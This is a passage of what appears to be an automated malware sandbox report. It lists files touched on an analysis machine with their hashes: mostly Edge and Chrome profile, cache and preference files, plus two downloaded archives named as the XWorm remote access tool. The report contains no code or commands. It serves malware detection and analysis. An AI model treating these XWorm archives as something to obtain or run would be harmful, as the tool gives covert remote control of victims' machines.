| SHA1 | 4e3ef0039280c5887607f50f2e7537d4c537691c |
| SHA256 | 2ee3858d9fd18661f0359f85f37cb3e264a9f273567d845744decbb4a91f6ff6 |
| SHA512 | 912444becd0be19d44333a5c625ff1e921151ea3c2eb7b9df45f8e2bf03501c096398361118702279519fcf8fa645666734d37fe6438f1c3ad291c0e23c4af81 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | b9fb7f45ef5b851359c423cb9f0f674f |
| SHA1 | 877494509eadcfb3697b90993ccce68a3cbbf05d |
| SHA256 | 34bdfa74d51db6f48d1ee14386b048f23428b9a8ea1648b885e07502c70c363e |
| SHA512 | 49850062d1cad73b120c3bd1963c0ec4ba14340b7527a9098f5f5da13b01f347945ae8ab514b52218d4448dab6fd694d14fa2590d9b48d303425866f508eb037 |
C:\Users\Admin\AppData\Local\Google\Chrome\Pandora\Default\Network\Network Persistent State
| MD5 | 98ba8fadb40473d6e96dc8c13486be6b |
| SHA1 | 82c7f83a3dc7891487167f4718dc6dd111cb551b |
| SHA256 | d9264b150c87cd96978a005cb97fe8226c42072d55cc6ef8c2105f11bcc32f7c |
| SHA512 | 2049aafe24022d2b3933702089f79d056c8e8a5ca6d2cb9591b3aa2645f58a6c3ba511f5035c35de9358ebdc7ce1486e134004d3e6afd87da80a21506c0781f4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 3a1f3a78686ff36480d9874b474c64f7 |
| SHA1 | 160eea8b5c60b2cea0eead7b96bb995667c2901e |
| SHA256 | 34652429ba21b37bc0c1bc881926b696886fb9e32c2112a3b9d5ab6f38829bf9 |
| SHA512 | f61bebe70bc63edf3bf72f155ff88c5b90cc60b734687f797a001254d2cd078e0b85c3acd0d3f586de579f64d7dc00c877ad3f6ddbf2b3b685e9dd0b7e8b01f4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 2cb051c72fab87f21aa8755f97290a29 |
| SHA1 | acea95aa4d410ff1cb4a00d889f131b6b081ee5c |
| SHA256 | 78695876341db0bff5958416af2c1b017a46f38c3c9d7e0004ac7536ec50cf14 |
| SHA512 | bf1facad2caf58a2c21e80fe386cacae00df5e2afd160619f7bb204f81380fd2c20ed09e15846362b690d64fac89a4981f69fd21420ea0a09f8ea8dc108d6041 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | d206c39d581388e083961b8fe5087f2f |
| SHA1 | eaac9ccd93014ad1167f96f948ee1112a8e273e4 |
| SHA256 | 3ae0a8eb3c791f3d6bdf767eb635f1e0c252031f3c69bd233be923bf07d73128 |
| SHA512 | 0b2942e2d14eba6d41a97308cbed1f664c9bac97c6ef9666b916eeaaa2104ede39d0fc9b6aa04501cdf71171b30b8e1de96fd9cc1573e97846730493ebaf8c55 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | d7b4f34c5102c38ad83658ed7bde51a4 |
| SHA1 | 618b91e3de31a6f1fcebc67cb66a2100d5e53582 |
| SHA256 | e339d856b022027fdfcbe376280e68e24a395fcdb7a2c73dfc96964a7fbf7932 |
| SHA512 | 80f58c20a0bd41e48acff6b867de0d8a6e4405b8021396033e6071d2e1268d58894cb86d63efe022a95caf65d93c46cda3e31d497bfbb4f3caf8b24df8067d86 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 6ec45fcdadb37e1c09b9d9d519fa1529 |
| SHA1 | 21ff52d181a54891bdf5af964b2ebbaefac0d1df |
| SHA256 | abe1b04f25279c834a49e164d1e74e1e8e126ef3bda8b3d93287a045444d6a1f |
| SHA512 | 84187a045cf9cc4f76d4fbe33c9d0d45d3648c22d7fac1e977599f7038807e6a35600d8069a207f441785a560d03f1ef13d866cece709238ef8fe3de6729db81 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 9990335ab856817d460d01eeb35143db |
| SHA1 | d5862dfc199cde029c1260e1d72eafcba76da0d3 |
| SHA256 | 1641b5d51b6e914b13daeb4bcac377f9894d829e63460fecdb7603ce8c633eb7 |
| SHA512 | ea1dfb74b21799cbb91e5814241731e0ef9533904b61222f5ca83602b8e9be9f544f8c8a5424250c3da46c2c6a098418339f4bc8f067efca6a040bdb768d12fc |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | f8461123eb29c4f2a65ae370e57085c4 |
| SHA1 | f058e97ed6c251a91da3ec57f183dedc94d5439f |
| SHA256 | b3ee77e68d749919d3ff1619f22a4c3bc6b05ee86c2684474cc13c0f98e03c1c |
| SHA512 | f06b471a660d8950909a91e8b2ebacd1f87fc1fde2e6c9ddc2e296ea45c87bdbfb739271fa23cac55ed43500084a57519292767952ecc7f24709e288a2f0c810 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\eb5a38eb6d74971f_0
| MD5 | 101fec33f560fa923de2f7a0572abaf8 |
| SHA1 | 15e8538f6f5b1a2871e1cd2413789a88a1e42bb7 |
| SHA256 | 85887d1748ce9e0423f78fe3f93b8c7cae81752c6a21c9065a64d6d1e5ff39c8 |
| SHA512 | 7f784bb4923ede7ea10858eeb7c360ae0a79a924096d432ff20d0df3d3a3c373d35a820927c1d09c245b30a26bb7500f23b3150aa8f0e64429a1449172161781 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\20f6bd3fa48d5b7a_0
| MD5 | 8ee5e7fad62c0277f4842ca208880b82 |
| SHA1 | 4502b091f1869a002c5bda1d3d1bf120d3a6d9d9 |
| SHA256 | c4f3a2ec9371f56b76232c36fc126be32d79b3e07c2bc342bf2b796f81ce4c92 |
| SHA512 | 03ade4db66080fd39b51fae44bc4e64d320c4d69389d315bfd23ed63e17fd6c271a9ea67a93a854bcf27646445121782fc8373406fa847d227dcfbed34e724d9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\4d04044bfb8f9703_0
| MD5 | a307c8ddf4c8990dc1c75a4c67f8aa5d |
| SHA1 | afd8a3ebb706563b09256e95e7f5fcfca1785223 |
| SHA256 | 7e90cbdcac73f692018d2e4bef6e4dffe86f4e890f5ec6e9feec660c6c16aece |
| SHA512 | 3456dbaed4bc326ae359f08ced6ec758a2d9717954d59c9f6d3f665992474663b860bc5d3321f52edeee54aa8289f8f27ddd0caee69a40002114217f7a2db7a1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\26cd902f6ec57e12_0
| MD5 | 49aa74bc470136c7596b582cb1023c6b |
| SHA1 | 04723b757ae72876ba8655ca69fb5b3e34a2346e |
| SHA256 | 15a6230a191c1bfa8c55019b04a0f7b0138a5df24cc05235ac9085e397268820 |
| SHA512 | 22ee7639042f7158496e3ed6c063ca5a3d22ade09dca79ff79affb1e6d08885eb4e60c57897df9971438504297153ee2d1b002be4607077b95f19030fc1199d0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\8b2929d923d98769_0
| MD5 | 5256c1009d835c71dc7be230de07eb3a |
| SHA1 | 2352c7dd03048ad878b580e575582842ebc2ef33 |
| SHA256 | 7ca58282df014c2de4d6319f9fe47054a73637444bf6baade9c2f7e4861e24c1 |
| SHA512 | 5564489fa59f47e3b9138b2ecfbad8f0c6cf8840d1ecc48579c22a1afbb4e34d4eb964aefef8a5d8745c8782a4b57fdc74cadd1382527f9b2c894c2cfae90bfc |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\0debc5fbf5dadca9_0
| MD5 | 3c9b0c077f77d9a6e4b6fca28ae6b603 |
| SHA1 | bfd1b951b9270904623ede7551b0300b6bfd46a7 |
| SHA256 | 54369152c15ec36c1960c3d090926f8c565dea1ca06cac7ebef6e7ebf43677b7 |
| SHA512 | 80839e03755bdeeecd6206b86d679ab393be0acc17e0ee6e2bff5ce94e532d3874afe52a0ffd8e44638ff177d839730cc06bb5c9a64333c7038eddf3400a1a5f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\2501308e6cfb93d6_0
| MD5 | f49781b6e7b385e49029af693dc1304f |
| SHA1 | cbc6b8252596a9729d5a5160a0da8ab87c6c409e |
| SHA256 | 2923d4f5f818a8357f66f9ff933348393f6448a37145635c341405bcd27d025e |
| SHA512 | 872d4448a173162dcc2a216f959c62053ec6787b940b042d1eba50e949802b5d49b7500a5099b623fd32453a47fe04fd2f5686b59cac8e676a90e6442f63fe3a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\ffe62a08b235c1d9_0
| MD5 | 31d6448fa95108c092cde31ed4aa5d61 |
| SHA1 | 30934831bfc104189408763d079ace69e341cda1 |
| SHA256 | 6e31259ff974584a07510f79992b19db653f8669a02d91c2f069d271d3b50559 |
| SHA512 | 724801d59b246309e0faa56a9fcbf5e0119a4c20071095ba0836470540b164183a666244af5ebec44fde8995b2423924b361a96c42ff7289214eb13ed5cac372 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\5d8ec1bc548746d5_0
| MD5 | c6a62c1534e96cd0ba897f17b7f82272 |
| SHA1 | fca11abc6cfa67720782e9afb4cf0a1a97e32af6 |
| SHA256 | 32d728cdc98b960ca8ade5e002bac89348a5f247ce8a201099b3615cad41976e |
| SHA512 | 1ddbee12b0d32e652f624c0785c78a022eb5e341ddcdc15b98afafb5a939e70092e84c756cc0bcc4065a519ededd07a1287d8981444a45fc009ffe82fcb85ea7 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 0348076ef3cf027c94b7e4b50afeec3d |
| SHA1 | 5ffb97188b6c56112d1358418c6bfe99b2830469 |
| SHA256 | bf0614e0eee5d777cf0fe503eaf6ffccdafceeab30dbe6355ea0463669080795 |
| SHA512 | 631be02a2943629755f2320bd6981d19f9013f12090304db3123835485ea41059042b01af9d73bc92adcc610a4b2106a17960041c4ac645bd32322112652a9eb |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 4a2659ded74630a59534b1ee939cd92a |
| SHA1 | b5be65e002464a5efe70ff2fedaf85f3ab97430c |
| SHA256 | da9792ae4665544f773fbca52a64e7ded9d831cf43ea8968f3f39fc352d93a57 |
| SHA512 | 008d48246e2c668dbc6b24e76ea37a4087fb66b0b4b5f2443b01c7aa6e3a34bcd077bf1779021f93b8af0205f66354c3e350226a40965bc7e9ba094931861959 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\cf937100869d08e9_0
| MD5 | aa0768ef861b6fbcdd6674e0a07242ef |
| SHA1 | 66fa9a6ed25a044ebe164ca4b0f7d3f9b6b813c0 |
| SHA256 | 3a89b7c4c3ddb2c753f5d6e8a45d0fdeb0548c538b5c710cbf53b4e7230f004a |
| SHA512 | 0359487726053d9fdf30ecd5f53ddf39a43943932262def456ba9106c58661f9dd4456b3d16594e5d939f7fa8c84c129c673ecd4dce601586e2b857b20aaed56 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\093c2bbfa743dbf2_0
| MD5 | b15caf13d9eead8350556098b0787323 |
| SHA1 | aa5f2476cd2f02d2327aedb3785fe3116a68a6c0 |
| SHA256 | e28494a810b738076ea81d4927b3bba9732f9d427eb40a710961ee109d797378 |
| SHA512 | b7d6f2d684f20a5ea58ed1c4a3a5aaaafbe705c8b528a862e3f081bacbcf62a65af7758bf219cbb043f2c67ac390ca42d2bcd6bff88e39b272aa8188b160dc27 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\27e087ae1db041bf_0
| MD5 | 469435d494f6fdc79ac25e586216d744 |
| SHA1 | 7cd97bc9ac163ef3f9a1e217f87de919a90fcca4 |
| SHA256 | d5a0f837bc925bed20469c9da527b4580ec4ae136bcf935d9ace9fd231fb5a02 |
| SHA512 | b5042d48a2abc02241045142f92f86e451a3944246b366e896fedbb0deda1c2386a2ad84d22cea2211df4d291e32588d080cfd807df80ed753bc67467fabda25 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | ebe93d473eafd8f3366708a3ee3f4d23 |
| SHA1 | 0da1939fb75e50069fe60048317cd1eda09851a2 |
| SHA256 | a203fdf6a2e1e564f85197170cb8a2579a817c0cc0dcb1d8ca29787a469f4e14 |
| SHA512 | bca52d2d54166e437dd67e4bc09ff996fde60ecf7d5b1be2821dc7c70d1aa7ac4ed8854c259df41b0648a4c420ccdaf58b6368c09f978833b856eb33f41b8387 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 8752f78686f49746e8a6b753d785e17c |
| SHA1 | 5591f6f9fde8979eda29649e06617a96d2fdad95 |
| SHA256 | 3beae194357c22c4b71101e5193fee3ba3595bf1ef2ce0b1013a5f5470d9925d |
| SHA512 | 34b3a3135a35f465c37dcdbb1e4a050d81a2c515c6f3ad210323ef14a8b84fbb7151d25a3868733d243b16966a0e28bfdc66e8800cc37fb2c4ee4a3a475ced23 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | cf82f84e46c80cb427187c7ac10f8e4e |
| SHA1 | 5f34b312dbce4107fd158a797eadf23d741754c0 |
| SHA256 | c530f2ee72b95452315c3c18ac7cc78458d94244bd7acad855663c72eae16319 |
| SHA512 | c7a51320cc49cfa6a082596805ba8acc4db3d7ac8a8fc07876fe3df60154cad79fcda7503ebccfb7fb819417853170f30c925f5aa830c2c141692842363b8ee7 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 72d549cdb80c143b7d146f0421d097c9 |
| SHA1 | 48526793e4613c7f25344331cea1992ed46742bf |
| SHA256 | 061d3a4baf51b09685fccaf55d246ec7f005cb4cce2c99f0e08dd8e82176f168 |
| SHA512 | 90de396e8be4bc8ef4b0ba5e949788b3f7aa20b0e10ab94aa33544d3bb6a27bb6750af5797ab17be4b7ff9f32d717f3edd8f19486022fa7d286c8aa87bbd19e7 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 2c1f236dfe161aa30a3164c97a434489 |
| SHA1 | a18ce8551cc431bd1aff599494436c4a74e09ac2 |
| SHA256 | 749a44692a757caa1994d8cd174f9bcc4fc2eb38b9aee8cb158572b7934a0192 |
| SHA512 | 7f0d47cc6f0ba4f58446ccb2551ad53545bcda6d53bae4dcedc6acd04c31af0899143db04252aacd60aa42706bbaaf5b42d8b4e3da6cc2f2f584acda95150391 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | fa9f26904eb30b7893f16c4671316417 |
| SHA1 | feef30f8863a0bc08661a9dd7810b3b589dc9ed2 |
| SHA256 | 6e75b0119771d0aa1b9425dcbf52d777f5e2ced2b50c0cf717458ce633b03719 |
| SHA512 | 7000d855ef043158f8b805d347d637a32383391a3f9947c331dee1379bc0118155c48efd2e693baa6b2f236d9d5556b03f9a153abfc1f357c656140959d8a7b5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 84ebe621dac680f04d485eb31e56bbd3 |
| SHA1 | d56625ae726b194bf1b829aa5c44d46d28015766 |
| SHA256 | 967807a5c8ec7ca0e3d1f1df459937c763256e2488d5bb8f698e64574d4319e5 |
| SHA512 | 67d999b10980ee029f872a15a5759456c87270eddb9620af3460c8d9202d1fa67120eb36438013129bc0de8f5fdf593cfb865855b5e92b6ea4bf41698f42121b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 47309c14ed9070ee71bc419e9d6544b3 |
| SHA1 | 2b2a8124ea71bcb218cd47ce15aaa3dc36cb951d |
| SHA256 | c3661fdee0c10dde771da75e009946369efc20bdb9566c691809c1e1de6bd085 |
| SHA512 | cb55068c53d2be2ebac7d06b8cf450f754a36ee1e1053b87d4186733f43aebaaf6f90f81d62ef66ed4e4595ae32781acb1d6647074d157ac5e7e0d0bbbf1d0e7 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 2cd8294a62b12075555d8ba7e7569ffc |
| SHA1 | 514c11028aa29f1f00338993c8239925a5867997 |
| SHA256 | e8e7c9e4d3203a27ca8e5f3f07b80039ca212dc1b1f309041252e5d0d959665e |
| SHA512 | fec4a4f23bd2f943ec29be6ae445923a61d7d1bbced9fc8c69af3e86ce9ffd6627d35239ed4b16e0001a97b8719f6cca631ec7695992c52e6828b967fb00607d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 8184f4fe7c3da17208fafbba2421c4c2 |
| SHA1 | 33ffe2c2784dfa9ef251321dbc85d768da139e14 |
| SHA256 | f4f7feb1e1bf1457a7b4e7812c5f5631d072dd0df483e6b5c6caf792e0266130 |
| SHA512 | 516487e151b453a53b31ebe4c7e9f00fb8e1c59dccf109304bdf4ad372528a98cc49e8ffbf933bf45e2675a7eeba60a7447c577d4de5bf511c2a75dec2cd9ff9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00003a
| MD5 | 9ec7dceb8c749a75852eab1e2870704e |
| SHA1 | 118df18e954ac58468ea0e49a42ea54014769408 |
| SHA256 | 4bf8610a3bf59b622143f07050e323b17a901d652f7c98ef56a191cb811d825c |
| SHA512 | ea68bc63365e9bdf603d3f3a9bb28a44448b8f4a6e8411365b4eac2cd77b6d3e546a9e9fd6161038ab70556bf0aa2425f25945169b67be4ed55ac1daf51621fa |
C:\Users\Admin\Downloads\XWorm-Remote-Access-Tool-main.zip
| MD5 | 7f450666e9781393ff2c69a06e362939 |
| SHA1 | 2d5eeb308b6e687a3c5acc182572ae398a058f19 |
| SHA256 | 973de3e5740ae8935a9d001e60dfe3d12e728009b7e5283116627dd6465d5902 |
| SHA512 | a8ec01ea493a8b91d0b09a9bbe70e98a90fcd8e2c4cb0e0f2fa142f38fe24c5557be754fb2f353de2b0b7c83ac1a17382a6731107cc635072b261691a549d15e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | f75b71e65261d8f7d8067fecec5757b1 |
| SHA1 | 99f9242c232eb91a1ce9c7d0ac1938475262ab0e |
| SHA256 | a683742a421f15b6afe7748fed135915eb5002dc59184089088e9f10c9e911ec |
| SHA512 | 97fd9704f4a02baa1ce6ea43f75db35ddec77c853a53a1a209cd5438aa25a6f1060033740bafd8ddf07bc3ef396c65d8506960a29e75b6c6243f78b0e3b58f5c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | f4a8e89b97834504463bac3beeea6a23 |
| SHA1 | afa08eebf16c8b47db7e262fdbd9c96e0663dc65 |
| SHA256 | 751f0fd0e6a257a1fbe99eebb5ac2c8e0f009fac37c1092d5b103774cdfb856a |
| SHA512 | 4819ead7816bf8ef31ed965e1eba4b965fc720e52beb9d0059739b80f73f4a443a1394a820893190342b0c9701bebe7eec8374b3adaacd7e269a64f580e3ed73 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\180e414f012d8ae3_0
| MD5 | a40d94301fbb1d20ce9f592980acd9dd |
| SHA1 | 19128fa468c0e9a341abe368421f4ba1c121b41e |
| SHA256 | d6f0120a04dc1f3d7bda8c905354886da837365a8ab72b5b5491f8b08f721aca |
| SHA512 | 93f0367e5b84f17e4fb74c0dba94f0765ff289b65059abfac444e79e3f546bfca725607d067498ad26c8e528fd3adbd2414ac850c1bddf6259e86768166b9b7e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\600f2ddd54cfa320_0
| MD5 | b9082dc5a604ca19534d0d633ebc7985 |
| SHA1 | 55c990840cdacf8846121cd40631c26f6c8967df |
| SHA256 | 70aa0c296157d59f6a7e2f8ad8f8755140bba0e71aad0c0881de696220963922 |
| SHA512 | 0b656a3e90f810cf756642f4b0a6df93780eebc5090033aa0895261260cdce723be5abcd9d6d71fee4358f98e1eac20a5f6487a935dace9f54121fcfbdb3b3ff |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\ca5b8db230134375_0
| MD5 | 9fe0fbfbf3cb48b19e90baa1c2cd53fc |
| SHA1 | 6805018f20c98a3c23e474aa69c0152b6e46b194 |
| SHA256 | 3ddb79717f092e703d4dc3f4adaa38d1d13a6dfd1ebd1ab8308471bd0cbd0b34 |
| SHA512 | d4d2f0e89925dcd8f0bf6ab7f6aa86c278dc110397f9438d40c8b9d34777e53e2b762deced7fdb5b3f7401da9d931af84b80e85b4dd6c2b77a41172ba50a2a65 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\0e1cc0aa9a9c464a_0
| MD5 | eb58abfe85764b3065595869c9d63d7b |
| SHA1 | c6dd458bd893226ce78a2fc22fb200cd3589fa17 |
| SHA256 | 5360dca37960b6d3571670b9862bddefdf6a398aa2a127c4779b7cd90ee6261c |
| SHA512 | 8d1f181e8c518e0ca273c6707cc2c287cd071a55ca6892b7512a921492f19f4db5a76e68c03fbf7c75d6a5ee1dcf70c6ba87b73be3e8fd3d256898d64d501bdb |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\2c3dae2387cac3b7_0
| MD5 | 2dded1f8f7d01a7c35e3688e577199e8 |
| SHA1 | d469d5ef1369e2b9789e3c519fd6a1b58d005760 |
| SHA256 | 553d5444dc9e7ed66f223679c6e3e57f0eeb12ef19850877736491ad4a5cfb5d |
| SHA512 | 0f007381250dc40ea248dcd4a0e96979f5c90f12824843b5114bd3f910719e7980541292c1a8d8141a9197e8bf077856e0064a7494ce066c66aca6957f8ef776 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\5526e5d56b1f071f_0
| MD5 | 4a26200ccbed99c7066d827aaaf8983c |
| SHA1 | 5e5f220376fd97bba05ad7d13f7ea5891a121ab6 |
| SHA256 | 405c895e26e3f3ecfba90d413a849fc80555faca33cb4c15a4579994578a9c10 |
| SHA512 | f41fb72790ce5eea04fbece671df9a46a30a805b40612495b1771c0818f3242b03c0c59856e78ca37e4c9356b9234462bc3fc21a5c6afe5d427cbf0d927b1020 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\4944e26945802309_0
| MD5 | 047877f87b8844dfa6d4db83baa12df1 |
| SHA1 | c09c48e888b391c966036c4a71f7eb656da5d321 |
| SHA256 | 23402b2aef55061cc083f700415b7746d2fd943e5e5e2b613eebb4ed0d2d7847 |
| SHA512 | 104d3ed31624b3782ba80c0df69262c9467989dddb65a99cfccef1682c8715974e823f027c7ac0b6c45738834c56b261d0ed53eecdea8679bf329de4f8495d67 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\d454d3e8f372d3b9_0
| MD5 | 58d4d6087858e9d31b2d12bebb52f0b2 |
| SHA1 | 59e58c07fc2043e8f8e1eeadf47976430d775347 |
| SHA256 | 867e12b964aaf8f6d15757ffcca0421955110d0f68da825fff49f6799a85645b |
| SHA512 | c94367f7f01ce2c173b7b9db7b555c4ce5f31d974c37f5ea2d7fd73a17dd9f4c8752ef12cb990366b59951b23880d8d096d9c60478a5e2a21aaed891dd13fcc5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00003c
| MD5 | fdedc7356552ef0724257c2b397673ba |
| SHA1 | dccb7b96ab20b5fe855872378328214c9a957f33 |
| SHA256 | 561ba8130265f08767b506be6006d451507a6ede0b1e99ca5c0c3314a2b6afb7 |
| SHA512 | 754d542ebfb2e035c3a0fc01a0f6bccec74ceb9574b376d433e487728f7bfaf03980cea1b3ae8ce4103e6d27909a7781c7f937be6482d105a919d49e7a021568 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\a5e5929ae65652a3_0
| MD5 | cb453b47656efb0ef96bcc81f023bbb9 |
| SHA1 | 786cb9cb2c0166286e42686d5ac454327a7ab4f1 |
| SHA256 | 23fa9877169b8d9fb1f594417609500ec705a0c57d22d75212f1a72c7dc33f45 |
| SHA512 | d5cb4e3aefeed3b79c8c270472754050b08c4b911e93a25b9ff74c2473b989a475bcaebe1294adeeba601dda592a85122b07aae27bc1528f73949a9a2d756f07 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\a8377101ac0f3165_0
| MD5 | 55e506bce266263873186b2089be4b87 |
| SHA1 | a6ab1cd12c9c6ef157818eaf6e0f0fc3d72076f6 |
| SHA256 | bb0dc16c3246cda97a31bf5f629ccffe6c6bc7c2d062f70d8e1a73c5361c3a52 |
| SHA512 | 032d14aed9a29b796e7c3a8ae78d0b818510ac8c42c004b0f1152e9183661d4e3e91974f3b359cddcb160df294764e5b729fab2631fdce96abfd6c9f7404973b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00003f
| MD5 | c09e0625df7a8f20db9b66acb754d42d |
| SHA1 | 60559158068f238553120a055f463199c7fed51e |
| SHA256 | a069a0771667fcae932dafdaa94d953223e4090536256db245285676c832617e |
| SHA512 | 63fc342d52ee2110dd7b0db731d1fd26306857ada46fa1d5d25ac0758a1899705c9ce9ca93d53f6eaecca08180df1b8cb2c731504fe88eb55c434b8198a3909f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00003e
| MD5 | eb0a159bc4f711f383bf205a7e8abcf4 |
| SHA1 | 744323ba7d3220fdfe5e7251fdee5f9071ad121e |
| SHA256 | e2a7516b0352d91c76b7e6eedd418dbf01b8ee1f0a3ef93fc88fde0d3e3d68b0 |
| SHA512 | 082ba40e7fc08499954581d4a3c507dfd0b94d519e2ffff5f7d2a6e7f100ce7e24ab87c7c3d49f64132585cd6db07c00cd1ef8527126d8764ec8493b7a92c954 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00003d
| MD5 | aa8ada05dfb233695d4eb83b761fa2b0 |
| SHA1 | 73ebf0b671fdfcd3defd6144d162203fd2f1d664 |
| SHA256 | d07cb56a265fcdc56c6ce7c282efd2df88bfe22ffa04ed9d667fcca83c32960d |
| SHA512 | 133429f4dca97fb2a0754c63f2ad0036e4f5316e6507e1ceed7ef110feb8cec86945bc9786615e8558a67020632259e8ac96c8a941374a5108f03694ada122c0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\57c06d65b9fec69c_0
| MD5 | 4808309415a4fd19e2555063e51bfb95 |
| SHA1 | a1120d5dbe149fde74bb54e21cb874e69b9ca2da |
| SHA256 | ffbd005a15ab44b1d625e86a70b8d422362230ff2aec74aaad3260ae2f1787f7 |
| SHA512 | 9f27706ff474cacbfbba4e2f70583d29c00d532d236a5574be91c121022f757886a8b33079e2a80b09ff29d28c2f15d53c8f08fd92de306532ac93ec52228737 |
C:\Users\Admin\Downloads\XWorm-Remote-Access-Tool-main (1).zip
| MD5 | f0448a71fa9118b4ce51cd853bea934f |
| SHA1 | 798873f6194aed7c897364e8b0a370273c6c1ca9 |
| SHA256 | 72229a3bddc7cc093532a254293acf2b8e8891f749a62093d300d9667d90eef0 |
| SHA512 | fad4f7c8cb8a813e5f783a22d3cadeacb5e2a0239e02b35498c52c56d715af5fe276a1fa99902cc67e9974b76e0285785bc12a5e3845186953b33f898fcfb39a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | b689c97c7b7b90d633443af653e06102 |
| SHA1 | 1a2f1d38ab2d1dd8e1f4efb5b55fae3cc01fe3c9 |
| SHA256 | 6e074a5a8bea4fcd46c891e8cad3f1cbcae1b1d5cadcf473ab9d064298d1441e |
| SHA512 | 54c99677f500359e5847db0c47405f91c42d896d03cb7f2b20507a169e045111bbfef66964cd481558fc2acfdb7073f66b68d7f4491518802fc0af2021ae6428 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 55db3c778f26ec1c5e2cc429c9bf20f4 |
| SHA1 | 287aaa85a880a40b2753bd687ccc93829f42dc25 |
| SHA256 | 29d2922c96361187a40629789991ab2588610c73f61867e69d06e7f67be9dc82 |
| SHA512 | 7221cbb3a3b0300874614cf481aa98af830a845d3f4e67771531580a0b1378dcfbe7b011f3c238dd38ffaf8fd690e6a5444566b25d310b83fd365fca81773e3d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | a08e168e2eb4037c3714c590414178c1 |
| SHA1 | 19bd7d1eb5cdb523cef14fb690aad0271a09e103 |
| SHA256 | e956c9be5560c77c8066c3f69f4221389494cf92f226b68ade8707a7b1911ef9 |
| SHA512 | 7f9f09caada7c26b423ad7c5b4155e7064031f57a467059d968fe832afd8fe47ddd8b5e4fcce15be931b78793fb60382bff3f1e93c1a0b21d3221e667aacf9f5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 831fd0e64363779a49b0dafaa21324ab |
| SHA1 | d85b173758d793a4c75c827d0bd62696109de061 |
| SHA256 | 362fc2e008a19a8d3323d42a99396ac3b40c650152a060b710bfa4b88df8fb2d |
